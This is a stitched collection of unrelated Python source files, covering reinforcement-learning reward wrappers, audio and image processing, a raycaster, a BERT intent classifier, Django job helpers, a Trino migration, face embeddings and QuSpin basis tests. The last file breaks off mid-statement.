self.new_reward(reward), done, info def new_reward(self, reward): steering = self.history[0, 1*-self.num_command] last_steering = self.history[0, 2*-self.num_command] # print(f"Original reward: {reward} steer {steering} last_steer {last_steering} ") angle_diff = abs(steering - last_steering) penalization = 0 if angle_diff > 0.15: penalization = 2*angle_diff if reward < 0: for i in range(len(self.history)): if self.history[0, i * -self.num_command] >= 0.001: reward = -20 * self.history[0, i * -self.num_command] break if reward > 0 and penalization > 0: reward = 0 # print(f" penalize: {penalization} ang_dif {angle_diff}") reward -= penalization return reward from threading import Event, Thread # class DonkeyViewWrapper(gym.ObservationWrapper): # import pygame # def __init__(self, env, path_ae): # gym.ObservationWrapper.__init__(self, env) # self.env = env # self.ae = load_ae(path_ae) # self.display_width = 640 # self.display_height = 320 # self.game_display = None # self.raw_observation = None # self.decoded_surface = None # self.BLACK = (0, 0, 0) # self.WHITE = (255, 255, 255) # self.YELLOW = (255, 255, 0) # self.BLUE = (0, 0, 255) # self.reconstructed_image = None # self.ae_observation = None # self.game_over = False # self.start_process() # def main_loop(self): # pygame.init() # self.game_display = pygame.display.set_mode((self.display_width, self.display_height)) # pygame.display.set_caption('Agent View') # clock = pygame.time.Clock() # self.game_display.fill(self.WHITE) # while not self.game_over: # self.upateScreen() # clock.tick(30) # def start_process(self): # """Start main loop process.""" # self.process = Thread(target=self.main_loop) # self.process.daemon = True # self.process.start() # def pilImageToSurface(self, pilImage): # pilImage = pilImage.resize((640, 320)) # return pygame.image.fromstring( # pilImage.tobytes(), pilImage.size, pilImage.mode).convert() # def upateScreen(self): # self.game_display.fill((0, 0, 0)) # if self.reconstructed_image is not None: # pygame_surface = self.pilImageToSurface(self.reconstructed_image) # self.game_display.blit(pygame_surface, pygame_surface.get_rect(center=(320, 160))) # pygame.display.update() # def observation(self, observation): # # logger.info(observation.shape) # vae_dim = self.ae.z_size # self.ae_observation = observation.copy() # encoded = self.ae_observation.reshape(1, self.ae.z_size) # # encoded = self.ae_observation[:, :vae_dim] # self.reconstructed_image = self.ae.decode(encoded) # self.reconstructed_image = np.reshape(self.reconstructed_image, (80,160,3)) # plt.imshow(self.reconstructed_image) # plt.show() # return observation class SteeringSmoothWrapper(gym.RewardWrapper): def __init__(self, env: gym.Env) -> None: super().__init__(env) self.last_steering = 0.0 self.speed = 0.0 self.throttle = 0.0 # self.velocities = np.ones((1, 10), dtype=np.float32) def reset(self, **kwargs): self.last_steering = 0.0 self.hrottle = 0.0 self.speed = 0.0 return self.env.reset(**kwargs) def step(self, action): observation, reward, done, info = self.env.step(action) self.speed = info["speed"] return observation, self.reward(reward, action), done, info def reward(self, reward, action): angle = action[0] self.throttle = action[1] angle_diff = abs(angle - self.last_steering) self.last_steering = angle contrib_throttle = 0 if reward > 0: if self.throttle >=0.3 and self.throttle<=0.6: contrib_throttle = self.throttle*4 elif self.throttle < 0.1: contrib_throttle = -1 if angle_diff > 0.15: reward_return = reward + contrib_throttle + self.speed - (3*angle_diff) # print(f"PEN reward: {reward_return} - rew {reward} cont_thr {contrib_throttle} th{self.throttle}") return reward_return reward_return = (reward + contrib_throttle + self.speed) # print(f"PRO reward: {reward_return} - rew {reward} cont_thr {contrib_throttle} th{self.throttle} speed {self.speed}") return reward_return return reward class ActionClipWrapper(gym.ActionWrapper): def __init__(self, env: gym.Env) -> None: super().__init__(env) self.last_steering = 0.0 def action(self, action): diff = np.clip(action[0] - self.last_steering, -0.15, 0.15) #print(f"pred {action[0]} - last {last_steering} - now {last_steering + diff}") action[0] = self.last_steering + diff #steering = (.4*action[0])+(.6*self.last_steering) # print(f"CLIP ACTION: new {steering} old {action[0]} prec {self.last_steering}") #action[0] = steering self.last_steering = action[0] return action class MyMonitor(gym.Wrapper): def __init__(self, env: gym.Env, log_dir, name_model) -> None: super().__init__(env) self.env = env self.file = open(os.path.join(str(log_dir), name_model+"_metric.csv"), "w+") self.log = writer(self.file) self.log.writerow(['Episode', 'Timestep', 'Avg Steer', 'Min Reward', 'Avg Reward', 'Max Reward', 'Reward Sum', 'Episode Length (timestep)', 'Episode Time','Avg Speed', 'Max Speed', 'Min CTE', 'Avg CTE', 'Max CTE', 'Distance',"Average Throttle", "Max Throttle", "Min Throttle", "Average Absolute CTE", "Min Absolute CTE", "Max Absolute CTE", "Hit", "Num lap","Avg time lap", "Best time lap", ]) self.episode = 0 self.time_step = 0 def reset(self, **kwargs) -> GymObs: self.start_episode = time.time() self.episode_len = 0 self.steers = [] self.throttles = [] self.rewards = [] self.velocities = [] self.ctes = [] self.ctes_absolute = [] self.distance = 0.0 self.distance_time = self.start_episode self.episode +=1 self.num_lap = 0 self.laps_time = [] self.hit = 0 return self.env.reset(**kwargs) def step(self, action: Union[np.ndarray, int]) -> GymStepReturn: observation, reward, done, info = self.env.step(action) self.time_step += 1 self.steers.append(action[0]) self.throttles.append(action[1]) self.velocities.append(round(info["speed"], 4)) self.rewards.append(round(reward, 4)) self.ctes.append(round(info["cte"], 4)) self.ctes_absolute.append(round(abs(info["cte"]), 4)) self.distance += info["speed"] * (time.time() - self.distance_time) self.distance_time = time.time() self.episode_len += 1 self.num_lap = info["num_lap"] if info["time_last_lap"] > 0: self.laps_time.append(info["time_last_lap"]) if info["hit"] != "none": self.hit += 1 if done: unique_time_laps = [] avg_time_lap = 0.0 best_time_lap = 0.0 if self.num_lap > 0: unique_time_laps.append(np.unique(self.laps_time)) avg_time_lap = np.mean(unique_time_laps) best_time_lap = np.min(unique_time_laps) print("FINISH EPISODE:", self.episode, f"(timestep: {self.time_step})" , " timestep ep: ", round(self.episode_len, 4), " sum reward:", round(np.sum(self.rewards), 4), " avg reward:", round(np.mean(self.rewards), 4), " tot dist:", round(self.distance, 4), "avg throt:", round(np.mean(self.throttles), 4), "num laps: ", info["num_lap"]) self.log.writerow([self.episode, self.time_step, round(np.mean(self.steers), 4), round(np.min(self.rewards), 4), round(np.mean(self.rewards), 4), round(np.max(self.rewards), 4), round(np.sum(self.rewards), 4), self.episode_len, round((time.time() - self.start_episode), 4), round(np.mean(self.velocities), 4), round(np.max(self.velocities), 4), round(np.min(self.ctes), 4), round(np.mean(self.ctes), 4), round(np.max(self.ctes), 4), round(self.distance, 4), round( np.mean(self.throttles), 4), round(np.max(self.throttles), 4), round(np.min(self.throttles), 4), round(np.mean(self.ctes_absolute), 4), round(np.min(self.ctes_absolute), 4), round(np.max(self.ctes_absolute), 4), self.hit, round(avg_time_lap, 6), round(best_time_lap, 6) ]) return observation, reward, done, info def close(self) -> None: """ Closes the environment """ super(MyMonitor, self).close() self.file.flush() def get_total_steps(self) -> int: """ Returns the total number of timesteps """ return self.time_step class NormalizeObservation(gym.Wrapper): def __init__(self, env: gym.Env) -> None: super().__init__(env) self.env = env def reset(self) -> GymObs: obs = self.env.reset() obs = obs.astype(np.float16) obs /= 255.0 return obs def step(self, action) -> GymStepReturn: observation, reward, done, info = self.env.step(action) observation = observation.astype(np.float32) observation /= 255.0 return observation, reward, done, info
StarcoderdataPython
120908
#!/usr/bin/python3 # # Copyright © 2017 jared <<EMAIL>> # from pydub import AudioSegment, scipy_effects, effects import os import settings, util # combine two audio samples with a crossfade def combine_samples(acc, file2, CROSSFADE_DUR=100): util.debug_print('combining ' + file2) sample2 = AudioSegment.from_wav(file2) output = acc.append(sample2, crossfade=CROSSFADE_DUR) output = effects.normalize(output) return output # combine audio samples with crossfade, from within program def combine_prog_samples(acc, nsamp, CROSSFADE_DUR=100): output = acc.append(nsamp, crossfade=CROSSFADE_DUR) return output # split an audio file into low, mid, high bands def split_file(fname): curr_file = AudioSegment.from_file(fname) low_seg = scipy_effects.low_pass_filter(curr_file, settings.LOW_FREQUENCY_LIM).export(fname + '_low.wav', 'wav') mid_seg = scipy_effects.band_pass_filter(curr_file, settings.LOW_FREQUENCY_LIM, settings.HIGH_FREQUENCY_LIM).export(fname + '_mid.wav', 'wav') high_seg = scipy_effects.high_pass_filter(curr_file, settings.HIGH_FREQUENCY_LIM).export(fname + '_high.wav', 'wav') ## add a sample to an existing wav #def add_sample(fname, samplefile, CROSSFADE_DUR=100): # new_file = combine_samples(fname, samplefile, CROSSFADE_DUR)[0] # os.rename(fname, 'old_' + fname) # os.rename(new_file, fname) # return new_file[1]
StarcoderdataPython
3338597
<reponame>risteon/nimble from __future__ import print_function import sys from nimble.sources import KittiOdometrySource from nimble.sinks import ImageDisplaySink def main(): if len(sys.argv) < 2: print("Specify the Kitti dataset root folder as argument") return kitti_data = KittiOdometrySource(sys.argv[1], 3) kitti_data.advance() kitti_data.seek(42) # only for seekable sources data, label = kitti_data.get_data() # print transform matrix print("Transform: ") print(label) # show image display = ImageDisplaySink() display.set_data(data) if __name__ == "__main__": main()
StarcoderdataPython
5008070
import os import argparse from shutil import move import cv2 import shutil parser = argparse.ArgumentParser() parser.add_argument("-i", "--inputdir", help="full directory path which hold images/data", type=str) args = parser.parse_args() new_dir = os.path.join (os.path.dirname(args.inputdir), "resized_selected_images") if not os.path.isdir(new_dir): os.mkdir(new_dir) for filename in os.listdir(args.inputdir): file_path = os.path.join(args.inputdir, filename) new_file_path = os.path.join(new_dir, filename) image = cv2.imread(file_path) if image.shape[0] <=400 or image.shape[1] <= 400: resized = image else: r = 400.0 / image.shape[1] dim = (400, int(image.shape[0] * r)) resized = cv2.resize(image, dim, interpolation = cv2.INTER_AREA) cv2.imwrite(new_file_path, resized) ''' cv2.imshow("resized", resized) k = cv2.waitKey(0) if k == 27: cv2.destroyAllWindows() break '''
StarcoderdataPython
9638461
"""This module contains a type to store calculate distances between the player and walls/objects""" from pygame.math import Vector2 import settings from side import Side class Plotter: """This type calculates sizes, distances and directions of in game objects in relation to the player""" def _avoid_zero(self, value): """use this function to avoid zero if we risk a divide by zero expression.""" if value == 0: return 0.000001 else: return value def get_object_size_based_on_distance(self, distance): """Returns a value between 1 (100%) and 0 (0%) describing how much of the vertical screen an object should consume based on its distance from the player""" size = int(settings.SCREEN_HEIGHT / self._avoid_zero(distance)) return size def get_distance_to_side(self, player_pos, map_pos, ray_direction, distance_delta): """get length of ray from current position to next x or y-side""" # subtract current map square x cord from the total ray x to get the difference/distance in x from the ray origin to the left wall, # as if we are moving right the rayPosition.x will be the greater value and we want an absolute/non negative value for the difference. # this is the same as the ratio of how far the ray position is across the map grid square in x, 0 = 0% and 1 = 100%. # OR subtract ray.x from the NEXT square's X co-ordinate to get the difference/distance in x from the ray origin to the right wall, # as if we are moving right the map x + 1 will be the greater value and we want an absolute/non negative value for the difference. # this is the same as the ratio of how far the ray position is across the next map grid square in x, 0 = 0% and 1 = 100%. x_ratio = ( player_pos.x - map_pos.x) if ray_direction.x < 0 else (map_pos.x + 1 - player_pos.x) y_ratio = ( player_pos.y - map_pos.y) if ray_direction.y < 0 else (map_pos.y + 1 - player_pos.y) # multiply distance_delta by this ratio to get the true distance we need to go in the direction of the ray to hit the wall. distance_to_side = Vector2() distance_to_side.x = distance_delta.x * x_ratio distance_to_side.y = distance_delta.y * y_ratio return distance_to_side def get_ray_direction(self, x, player): """get a vector that represents the direction a ray travels from the player through the screen/camera plane at horizontal position / pixel column x""" # what percentage of the screen with is the current x value. x_ratio = x / settings.SCREEN_WIDTH # x-coordinate along camera plane, from -1 through 0 and on to 1 camera_x = (2 * x_ratio) - 1 # The current ray is the sum of the player direction and the x-coordinate along camera plane return player.direction + player.camera_plane * camera_x def get_distance_delta(self, ray_direction): """length of ray from one x or y-side to next x or y-side""" # see https://gamedev.stackexchange.com/q/45013 for a better explanation. # calculate how the ratios of 1 to the x and y components # that is what number do you need to multiply x or y by to turn them into 1. x_ratio = 1 / self._avoid_zero(ray_direction.x) y_ratio = 1 / self._avoid_zero(ray_direction.y) # create vectors for where x/y has length 1 using these multipliers. scaled_x = ray_direction * x_ratio scaled_y = ray_direction * y_ratio # the length of these vectors represent how far the ray has to travel to move one unit in x or one unit in y. # Remember, we can get the length of a vector with the Pythagorean theorem. # a*a + b*b = c*c OR # x*x + y*y = length * length SO # length = sqrt(x*x + y*y) distance_delta = Vector2() distance_delta.x = scaled_x.length() distance_delta.y = scaled_y.length() return distance_delta def get_wall_x_across_percentage(self, side, player_pos, ray_direction, perceptual_wall_distance): """get where exactly a wall was hit in terms of a value between 0 and 1.""" distance_ray_has_travelled_in_one_axis = 0 # if we had hit a left or right side, we need to know how far in y the ray has travelled # from the player. if (side == Side.LeftOrRight): distance_ray_has_travelled_in_one_axis = player_pos.y + \ (perceptual_wall_distance * ray_direction.y) # if we have hit a top or bottom side, we need to know how far in x the ray has travelled # from the player else: distance_ray_has_travelled_in_one_axis = player_pos.x + \ perceptual_wall_distance * ray_direction.x # we only want a measure of how far across the wall we have hit as a # percentage, so we use the modulo operator to get rid of # the whole part of the number. This would make 10.77 into 0.77 return distance_ray_has_travelled_in_one_axis % 1 def get_perceptual_wall_distance(self, side, player, map_pos, step, ray_direction): """Calculate distance projected on camera direction (oblique distance will give fisheye effect!)""" if side == Side.LeftOrRight: # this difference is how far the ray has travelled in x before hitting a side wall. distance_in_x = map_pos.x - player.position.x # if step = 1/positive x/right, make this 0. if step = -1/negative x/left make it 1. one_or_zero = (1 - step.x) / 2 perceptual_wall_distance = ( distance_in_x + one_or_zero) / ray_direction.x else: # this difference is how far the ray has travelled in y before hitting a wall. distance_in_y = map_pos.y - player.position.y # if step = 1/positive y/up, make this 0. if step = -1/negative y/down make it 1. one_or_zero = (1 - step.y) / 2 perceptual_wall_distance = ( distance_in_y + one_or_zero) / ray_direction.y perceptual_wall_distance = self._avoid_zero( perceptual_wall_distance) return perceptual_wall_distance
StarcoderdataPython
1621301
<filename>src/xbot/nlu/intent/intent_with_bert.py import os import json from typing import Any from src.xbot.util.nlu_util import NLU from src.xbot.constants import DEFAULT_MODEL_PATH from src.xbot.util.path import get_root_path, get_config_path, get_data_path from src.xbot.util.download import download_from_url from data.crosswoz.data_process.nlu_intent_dataloader import Dataloader from data.crosswoz.data_process.nlu_intent_postprocess import recover_intent import torch from torch import nn from transformers import BertModel # def recover_intent_predict(dataloader, intent_logits): # das = [] # # max_index = torch.argsort(intent_logits, descending=True).numpy() # for j in max_index[0:5]: # intent, domain, slot, value = re.split(r'\+', dataloader.id2intent[j]) # das.append([intent, domain, slot, value]) # return das class IntentWithBert(nn.Module): """Intent Classification with Bert""" def _forward_unimplemented(self, *input: Any) -> None: pass def __init__(self, model_config, device, intent_dim, intent_weight=None): super(IntentWithBert, self).__init__() # count of intent self.intent_num_labels = intent_dim # init intent weight self.intent_weight = ( intent_weight if intent_weight is not None else torch.tensor([1.0] * intent_dim) ) # gpu self.device = device # load pretrain model from model hub self.bert = BertModel.from_pretrained(model_config["pretrained_weights"]) self.dropout = nn.Dropout(model_config["dropout"]) self.finetune = model_config["finetune"] self.hidden_units = model_config["hidden_units"] if self.hidden_units > 0: self.intent_hidden = nn.Linear( self.bert.config.hidden_size, self.hidden_units ) self.intent_classifier = nn.Linear( self.hidden_units, self.intent_num_labels ) nn.init.xavier_uniform_(self.intent_hidden.weight) else: self.intent_classifier = nn.Linear( self.bert.config.hidden_size, self.intent_num_labels ) nn.init.xavier_uniform_(self.intent_classifier.weight) # Binary Cross Entropy self.intent_loss_fct = torch.nn.BCEWithLogitsLoss(pos_weight=self.intent_weight) def forward(self, word_seq_tensor, word_mask_tensor, intent_tensor=None): if not self.finetune: self.bert.eval() with torch.no_grad(): # torch.no_grad() 是一个上下文管理器,被该语句 wrap 起来的部分将不会track 梯度。 outputs = self.bert( input_ids=word_seq_tensor, attention_mask=word_mask_tensor ) else: # 更新参数 outputs = self.bert( input_ids=word_seq_tensor, attention_mask=word_mask_tensor ) pooled_output = outputs[1] if self.hidden_units > 0: pooled_output = nn.functional.relu( self.intent_hidden(self.dropout(pooled_output)) ) pooled_output = self.dropout(pooled_output) intent_logits = self.intent_classifier(pooled_output) intent_loss = None if intent_tensor is not None: intent_loss = self.intent_loss_fct(intent_logits, intent_tensor) return intent_logits, intent_loss class IntentWithBertPredictor(NLU): """NLU Intent Classification with Bert 预测器""" default_model_config = "nlu/crosswoz_all_context_nlu_intent.json" default_model_name = "pytorch-intent-with-bert_policy.pt" default_model_url = ( "http://qiw2jpwfc.hn-bkt.clouddn.com/pytorch-intent-with-bert.pt" ) def __init__(self): # path root_path = get_root_path() config_file = os.path.join( get_config_path(), IntentWithBertPredictor.default_model_config ) # load config config = json.load(open(config_file)) self.device = config["DEVICE"] # load intent vocabulary and dataloader intent_vocab = json.load( open( os.path.join( get_data_path(), "crosswoz/nlu_intent_data/intent_vocab.json" ), encoding="utf-8", ) ) dataloader = Dataloader( intent_vocab=intent_vocab, pretrained_weights=config["model"]["pretrained_weights"], ) # load best model best_model_path = os.path.join( os.path.join(root_path, DEFAULT_MODEL_PATH), IntentWithBertPredictor.default_model_name, ) # best_model_path = os.path.join(DEFAULT_MODEL_PATH, IntentWithBertPredictor.default_model_name) if not os.path.exists(best_model_path): download_from_url( IntentWithBertPredictor.default_model_url, best_model_path ) model = IntentWithBert(config["model"], self.device, dataloader.intent_dim) model.load_state_dict(torch.load(best_model_path, map_location=self.device)) model.to(self.device) model.eval() self.model = model self.dataloader = dataloader print(f"{best_model_path} loaded - {best_model_path}") def predict(self, utterance, context=list()): # utterance ori_word_seq = self.dataloader.tokenizer.tokenize(utterance) # tag # ori_tag_seq = ['O'] * len(ori_word_seq) intents = [] word_seq, new2ori = ori_word_seq, None batch_data = [ [ori_word_seq, intents, word_seq, self.dataloader.seq_intent2id(intents)] ] pad_batch = self.dataloader.pad_batch(batch_data) pad_batch = tuple(t.to(self.device) for t in pad_batch) word_seq_tensor, word_mask_tensor, intent_tensor = pad_batch # inference intent_logits, _ = self.model(word_seq_tensor, word_mask_tensor) # postprocess intent = recover_intent(self.dataloader, intent_logits[0]) return intent if __name__ == "__main__": nlu = IntentWithBertPredictor() print(nlu.predict("北京布提克精品酒店酒店是什么类型,有健身房吗?"))
StarcoderdataPython
4970387
<reponame>stcz/qfieldcloud<filename>docker-app/qfieldcloud/core/utils2/jobs.py import logging from typing import List, Optional import qfieldcloud.core.models as models from django.db.models import Q from qfieldcloud.core import exceptions logger = logging.getLogger(__name__) def apply_deltas( project: "models.Project", user: "models.User", project_file: str, overwrite_conflicts: bool, delta_ids: List[str] = None, ) -> Optional["models.ApplyJob"]: """Apply a deltas""" logger.info( f"Requested apply_deltas on {project} with {project_file}; overwrite_conflicts: {overwrite_conflicts}; delta_ids: {delta_ids}" ) apply_jobs = models.ApplyJob.objects.filter( project=project, status=[ models.Job.Status.PENDING, models.Job.Status.QUEUED, ], ) if len(apply_jobs) > 0: return apply_jobs[0] pending_deltas = models.Delta.objects.filter( project=project, last_status=models.Delta.Status.PENDING, ) if delta_ids is not None: pending_deltas = pending_deltas.filter(pk__in=delta_ids) if len(pending_deltas) == 0: return None apply_job = models.ApplyJob.objects.create( project=project, created_by=user, overwrite_conflicts=overwrite_conflicts, ) return apply_job def repackage(project: "models.Project", user: "models.User") -> "models.PackageJob": """Returns an unfinished or freshly created package job. Checks if there is already an unfinished package job and returns it, or creates a new package job and returns it. """ if not project.project_filename: raise exceptions.NoQGISProjectError() # Check if active package job already exists query = Q(project=project) & ( Q(status=models.PackageJob.Status.PENDING) | Q(status=models.PackageJob.Status.QUEUED) | Q(status=models.PackageJob.Status.STARTED) ) if models.PackageJob.objects.filter(query).count(): return models.PackageJob.objects.get(query) package_job = models.PackageJob.objects.create(project=project, created_by=user) return package_job def repackage_if_needed( project: "models.Project", user: "models.User" ) -> "models.PackageJob": if not project.project_filename: raise exceptions.NoQGISProjectError() if project.needs_repackaging: package_job = repackage(project, user) else: package_job = ( models.PackageJob.objects.filter(project=project) .order_by("started_at") .get() ) return package_job
StarcoderdataPython
6662594
<filename>scripts/cji_scripts/migrate_trino.py #! /usr/bin/env python3.8 import logging import os import trino logging.basicConfig(format="%(asctime)s: %(message)s", datefmt="%m/%d/%Y %I:%M:%S %p", level=logging.INFO) PRESTO_HOST = os.environ.get("PRESTO_HOST", "localhost") PRESTO_USER = os.environ.get("PRESTO_USER", "admin") PRESTO_CATALOG = os.environ.get("PRESTO_CATALOG", "hive") try: PRESTO_PORT = int(os.environ.get("PRESTO_PORT", "8080")) except ValueError: PRESTO_PORT = 8080 CONNECT_PARAMS = { "host": PRESTO_HOST, "port": PRESTO_PORT, "user": PRESTO_USER, "catalog": PRESTO_CATALOG, "schema": "default", } def get_schemas(): sql = "SELECT schema_name FROM information_schema.schemata" schemas = run_trino_sql(sql, CONNECT_PARAMS) schemas = [ schema for listed_schema in schemas for schema in listed_schema if schema not in ["default", "information_schema"] ] return schemas def run_trino_sql(sql, conn_params): with trino.dbapi.connect(**conn_params) as conn: cur = conn.cursor() cur.execute(sql) result = cur.fetchall() return result def drop_tables(tables, conn_params): for table_name in tables: logging.info(f"dropping table {table_name}") sql = f"DROP TABLE IF EXISTS {table_name}" try: result = run_trino_sql(sql, conn_params) logging.info("Drop table result: ") logging.info(result) except Exception as e: logging.info(e) def add_columns_to_table(columns, table, conn_params): for column in columns: logging.info(f"adding column {column} to table {table}") sql = f"ALTER TABLE {table} ADD COLUMN IF NOT EXISTS {column} double" try: result = run_trino_sql(sql, conn_params) logging.info("ALTER TABLE result: ") logging.info(result) except Exception as e: logging.info(e) def drop_columns_from_table(columns, table, conn_params): for column in columns: logging.info(f"Dropping column {column} from table {table}") sql = f"ALTER TABLE IF EXISTS {table} DROP COLUMN IF EXISTS {column}" try: result = run_trino_sql(sql, conn_params) logging.info("ALTER TABLE result: ") logging.info(result) except Exception as e: logging.info(e) def main(): logging.info("Running the hive migration for cost model effective cost") logging.info("fetching schemas") schemas = get_schemas() logging.info("Running against the following schemas") logging.info(schemas) # tables_to_drop = [] # columns_to_add = [] columns_to_drop = ["project_rank", "data_source_rank"] for schema in schemas: CONNECT_PARAMS["schema"] = schema # logging.info(f"*** dropping tables for schema {schema} ***") # drop_tables(tables_to_drop, CONNECT_PARAMS) logging.info(f"*** Dropping columns for schema {schema} ***") drop_columns_from_table( columns_to_drop, "reporting_ocpawscostlineitem_project_daily_summary_temp", CONNECT_PARAMS ) drop_columns_from_table(columns_to_drop, "reporting_ocpawscostlineitem_project_daily_summary", CONNECT_PARAMS) drop_columns_from_table( columns_to_drop, "reporting_ocpazurecostlineitem_project_daily_summary_temp", CONNECT_PARAMS ) drop_columns_from_table( columns_to_drop, "reporting_ocpazurecostlineitem_project_daily_summary", CONNECT_PARAMS ) drop_columns_from_table( columns_to_drop, "reporting_ocpgcpcostlineitem_project_daily_summary_temp", CONNECT_PARAMS ) drop_columns_from_table(columns_to_drop, "reporting_ocpgcpcostlineitem_project_daily_summary", CONNECT_PARAMS) if __name__ == "__main__": main()
StarcoderdataPython
1702749
from openface.openface_model import create_model from openface.preprocess_face_data import load_metadata from openface.align import AlignDlib import numpy as np import cv2 import config import os from datetime import datetime # using pre-trained model print('load_model') nn4_small2_pretrained = create_model() nn4_small2_pretrained.load_weights('models/nn4.small2.v1.h5') # nn4_small2_pretrained.summary() start = datetime.now() # load customDataset print(config.faceImagesPath) metadata = load_metadata('faceImages', num=2) print(metadata) def load_image(path): img = cv2.imread(path, 1) # OpenCV loads images with color channels # in BGR order. So we need to reverse them return img[..., ::-1] # Initialize the OpenFace face alignment utility aligment = AlignDlib('models/landmarks.dat') # Align image on face def align_image(img): return aligment.align(96, img, aligment.getLargestFaceBoundingBox(img), landmarkIndices=AlignDlib.OUTER_EYES_AND_NOSE) # Embedding vectors good_image_index = [] unfit_image_index = [] embedded = np.zeros((metadata.shape[0], 128)) print('preprocess image') for i, m in enumerate(metadata): img = load_image(m.image_path()) img = align_image(img) try: # scale RGB values to interval [0,1] img = (img / 255.).astype(np.float32) except TypeError: unfit_image_index.append(i) print("The image is not Clear to extract the Embeddings") else: # obtain embedding vector for image embedded[i] = nn4_small2_pretrained.predict(np.expand_dims(img, axis=0))[0] good_image_index.append(i) stop = datetime.now() print(stop - start) metadata = metadata[good_image_index] print(metadata) embedded = embedded[good_image_index] print(embedded) print('face embedded create complete') print('save metadata and embedded') if not os.path.exists(config.faceData): os.makedirs(config.faceData, exist_ok='True') # save metadata np.save(config.faceData+'/metadata.npy', metadata) # save embedded np.save(config.faceData+'/embedded.npy', embedded)
StarcoderdataPython
304071
<filename>compare_methods.py import sem_utils import numpy as np import pandas as pd np.random.seed(4578347) ##setup search parameters: timeseries_lengths = np.array([30,100,300,1000,3000,10000]) timeseries_rhos = np.array([0.1, 0.3, 0.5, 0.7, 0.9, 0.99]) numrpts = 100 ##setup names and estimation functions method_names = ['Naive', 'BlockAveraging', 'Chodera', 'Sokal', 'AR1_correction', 'AR1_Bayes'] method_functions = [sem_utils.ci_from_independent, sem_utils.ci_from_blockAveraging, sem_utils.ci_from_chodera, sem_utils.ci_from_sokal, sem_utils.ci_from_autoregressive_correction, sem_utils.hpd_from_bayesian_estimation] ##setup df to store the results (we are using long format here due to the complicated structure of the search grid) df = pd.DataFrame(columns=['methodName', 'trueRho', 'timeSeriesLength', 'estMean', 'mean_low', 'mean_high']) row_num = 0 ##do the measurements: for rho in timeseries_rhos: for datasize in timeseries_lengths: for rpt in range(numrpts): timeseries = sem_utils.gen_correlated_curve(rho, datasize) estimated_mean = timeseries.mean() for methodName, function in zip(method_names, method_functions): mean_low, mean_high = function(timeseries) results = [methodName, rho, datasize, estimated_mean, mean_low, mean_high] print(results) df.loc[row_num] = results row_num += 1 ##save the csv file: df.to_csv('sem_results.csv')
StarcoderdataPython
354403
<filename>Warm-Up Challenges/CountingValleys.py #!/bin/python3 import math import os import random import re import sys # Complete the countingValleys function below. def countingValleys(n, s): UD = {'U': 1, 'D': -1} sea_level = 0 valley = 0 for step in s: sea_level = sea_level + UD[step] if not sea_level and step == 'U': valley += 1 return valley if __name__ == '__main__': fptr = open(os.environ['OUTPUT_PATH'], 'w') n = int(input()) s = input() result = countingValleys(n, s) fptr.write(str(result) + '\n') fptr.close()
StarcoderdataPython
266052
<gh_stars>100-1000 from __future__ import print_function, division import sys,os quspin_path = os.path.join(os.getcwd(),"../") sys.path.insert(0,quspin_path) from quspin.operators import hamiltonian from quspin.basis import spin_basis_general, boson_basis_general, spinless_fermion_basis_general, spinful_fermion_basis_general import numpy as np import scipy.sparse as sp from quspin.operators._make_hamiltonian import _consolidate_static # ###### define model parameters ###### J1=1.0 # spin=spin interaction J2=0.5 # magnetic field strength Lx, Ly = 4, 2 # linear dimension of 2d lattice N_2d = Lx*Ly # number of sites # ###### setting up user-defined symmetry transformations for 2d lattice ###### s = np.arange(N_2d) # sites [0,1,2,....] x = s%Lx # x positions for sites y = s//Lx # y positions for sites T_x = (x+1)%Lx + Lx*y # translation along x-direction T_y = x +Lx*((y+1)%Ly) # translation along y-direction T_a = (x+1)%Lx + Lx*((y+1)%Ly) # translation along anti-diagonal T_d = (x-1)%Lx + Lx*((y+1)%Ly) # translation along diagonal R = np.rot90(s.reshape(Lx,Ly), axes=(0,1)).reshape(N_2d) # rotate anti-clockwise P_x = x + Lx*(Ly-y-1) # reflection about x-axis P_y = (Lx-x-1) + Lx*y # reflection about y-axis Z = -(s+1) # spin inversion ##### # setting up site-coupling lists J1_list=[[J1,i,T_x[i]] for i in range(N_2d)] + [[J1,i,T_y[i]] for i in range(N_2d)] J2_list=[[J2,i,T_d[i]] for i in range(N_2d)] + [[J2,i,T_a[i]] for i in range(N_2d)] # static=[ ["++",J1_list],["--",J1_list],["zz",J1_list], ["++",J2_list],["--",J2_list],["zz",J2_list] ] static_spfs=[ ["++|",J1_list],["--|",J1_list], ["|++",J1_list],["|--",J1_list], ["z|z",J1_list], ["++|",J2_list],["--|",J2_list], ["|++",J2_list],["|--",J2_list], ["z|z",J2_list], ] static_list = _consolidate_static(static) static_list_spfs = _consolidate_static(static_spfs) def compare(static_list,basis,basis_op): for opstr,indx,J in static_list: ME,bra,ket = basis.Op_bra_ket(opstr,indx,J,np.float64,basis_op.states) ME_op,row,col = basis_op.Op(opstr,indx,J,np.float64) np.testing.assert_allclose(bra - basis_op[row],0.0,atol=1E-5,err_msg='failed bra/row in Op_bra_cket test!') np.testing.assert_allclose(ket - basis_op[col],0.0,atol=1E-5,err_msg='failed ket/col in Op_bra_ket test!') np.testing.assert_allclose(ME - ME_op,0.0,atol=1E-5,err_msg='failed ME in Op_bra_ket test!') for Np in [ None, 2, N_2d-1, [N_2d//4,N_2d//8] ]: basis=spin_basis_general(N_2d, make_basis=False, Nup=Np, kxblock=(T_x,0),kyblock=(T_y,0), pxblock=(P_x,0),pyblock=(P_y,0), zblock=(Z,0) ) basis_op=spin_basis_general(N_2d, make_basis=True, Nup=Np, kxblock=(T_x,0),kyblock=(T_y,0), pxblock=(P_x,0),pyblock=(P_y,0), zblock=(Z,0) ) compare(static_list,basis,basis_op) print('passed spins') basis=spinless_fermion_basis_general(N_2d, make_basis=False, Nf=Np, kxblock=(T_x,0),kyblock=(T_y,0), pxblock=(P_x,0),pyblock=(P_y,0), ) basis_op=spinless_fermion_basis_general(N_2d, make_basis=True, Nf=Np, kxblock=(T_x,0),kyblock=(T_y,0), pxblock=(P_x,0),pyblock=(P_y,0), ) compare(static_list,basis,basis_op) print('passed spinless fermios') basis=boson_basis_general(N_2d, make_basis=False, Nb=Np, sps=3, kxblock=(T_x,0),kyblock=(T_y,0), pxblock=(P_x,0),pyblock=(P_y,0), ) basis_op=boson_basis_general(N_2d, make_basis=True, Nb=Np, sps=3, kxblock=(T_x,0),kyblock=(T_y,0), pxblock=(P_x,0),pyblock=(P_y,0), ) compare(static_list,basis,basis_op) print('passed bosons') if Np==None: Nf=Np elif type(Np) is list: Nf=list(zip(Np,Np)) else: Nf=(Np,Np) basis=spinful_fermion_basis_general(N_2d, make_basis=False, Nf=Nf, 